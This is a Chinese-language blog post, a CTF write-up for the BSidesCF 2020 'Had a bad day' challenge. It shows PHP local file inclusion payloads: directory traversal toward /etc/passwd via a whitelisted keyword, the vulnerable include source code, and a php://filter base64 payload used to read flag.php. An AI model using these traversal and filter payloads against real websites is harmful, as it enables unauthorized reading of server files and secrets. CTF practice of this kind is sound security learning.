[BSidesCF 2020]Had a bad day 1

最新推荐文章于 2024-02-12 23:13:49 发布

南冥~

最新推荐文章于 2024-02-12 23:13:49 发布

阅读量188

点赞数

文章标签： php 开发语言

本文链接：https://blog.csdn.net/plant1234/article/details/125012068

版权

[BSidesCF 2020]Had a bad day 1

首先打开题目得到：

在这里插入图片描述

通过测试发现在url处有：

在这里插入图片描述

疑似文件包含尝试：

../../../../etc/password

得到：

在这里插入图片描述

所以绕过这个限制

?category=woofers/../../../../etc/password

在这里插入图片描述

发现报错了于是就用php伪协议试试读取index.php

在这里插入图片描述

解码得到php源码：

<?php
				$file = $_GET['category'];

				if(isset($file))
				{
					if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
						include ($file . '.php');
					}
					else{
						echo "Sorry, we currently only support woofers and meowers.";
					}
				}
?>

发现只有检测到woofers、meowers、index时才能进行include进行文件包含

尝试一下看有没有flag.php文件：

?category=woofers/../flag

没有报错证明文件存在

而且：

在这里插入图片描述

再次利用php伪协议读取文件flag：

php://filter/convert.base64-encode/index/resource=flag

在这里插入图片描述

解码得到flag:

在这里插入图片描述

南冥~

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
[BSidesCF 2020]Had a bad day 1

[BSidesCF 2020]Had a bad day 1首先打开题目得到：通过测试发现在url处有：疑似文件包含尝试：../../../../etc/password得到：所以绕过这个限制?category=woofers/../../../../etc/password发现报错了于是就用php伪协议试试读取index.php解码得到php源码：<?php $file = $_GET['category']; if(isset($file))
复制链接

扫一扫